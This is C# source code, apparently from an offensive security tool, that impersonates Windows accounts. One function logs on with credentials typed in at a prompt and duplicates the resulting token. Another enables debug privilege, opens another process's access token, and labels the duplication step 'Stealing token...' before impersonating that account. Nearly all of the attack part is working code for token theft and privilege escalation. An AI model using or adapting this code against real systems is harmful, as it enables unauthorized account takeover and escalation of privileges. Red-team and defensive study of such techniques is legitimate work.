static void makeToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
{
Console.WriteLine("Current User: {0}", WindowsIdentity.GetCurrent().Name);
Console.Write("Enter the user you want to impersonate: ");
string username = Console.ReadLine();
Console.Write("Enter the password for the user you want to impersonate: ");
SecureString password = GetPassword();
Console.WriteLine();
//Logon the user to get a context handle
if (WindowsAPIHelper.LogonUser(username, Environment.MachineName, ConvertToUnsecureString(password), (int)WindowsAPIHelper.Logon32Type.Interactive, (int)WindowsAPIHelper.Logon32Provider.Default, ref token) != 0)
{
WindowsAPIHelper.SECURITY_ATTRIBUTES sa = new WindowsAPIHelper.SECURITY_ATTRIBUTES();
//Duplicate the token stolen from the logon.
//Nee to update this to DuplicateTokenEx
if (WindowsAPIHelper.DuplicateTokenEx(token, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, ref sa, WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, WindowsAPIHelper.TOKEN_TYPE.TokenPrimary, out duplicateToken))
{
WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken);
//Run commands using that tokens Impersonation Context.
using (WindowsImpersonationContext ImpersonationContext = impersonatedUser.Impersonate())
{
if (ImpersonationContext != null)
{
Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).Name, WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).User.Value);
}
}
}
else
{
Console.WriteLine("Unable to duplicate token!");
return;
}
}
else
{
Console.WriteLine("LogonUser failed! Are the credentials correct?");
return;
}
}
static void stealToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
{
//Check for Debugging
Console.WriteLine("Current User: {0}", WindowsIdentity.GetCurrent().Name);
IntPtr hToken = enableSEDebugPrivilege();
IntPtr hHandle = attachProcess();
WindowsAPIHelper.OpenProcessToken(hHandle, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, out token);
WindowsAPIHelper.SECURITY_ATTRIBUTES sa = new WindowsAPIHelper.SECURITY_ATTRIBUTES();
Console.WriteLine("Stealing token...");
//Token Type needs to be Primary if launching a new process, Impersonation if changing ThreadToken (Possibly? How true is this?)
if (WindowsAPIHelper.DuplicateTokenEx(token, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, ref sa, WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, WindowsAPIHelper.TOKEN_TYPE.TokenImpersonation, out duplicateToken))
{
if (duplicateToken == IntPtr.Zero)
{
Console.WriteLine("Failed");
return;
}
WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken);
//Run commands using that tokens Impersonation Context.
using (WindowsImpersonationContext ImpersonationContext = impersonatedUser.Impersonate())
{
if (ImpersonationContext != null)
{
Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).Name, WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).User.Value);
}
}
}
else
{
Console.WriteLine("Unable to duplicate token!");
return;
}
}
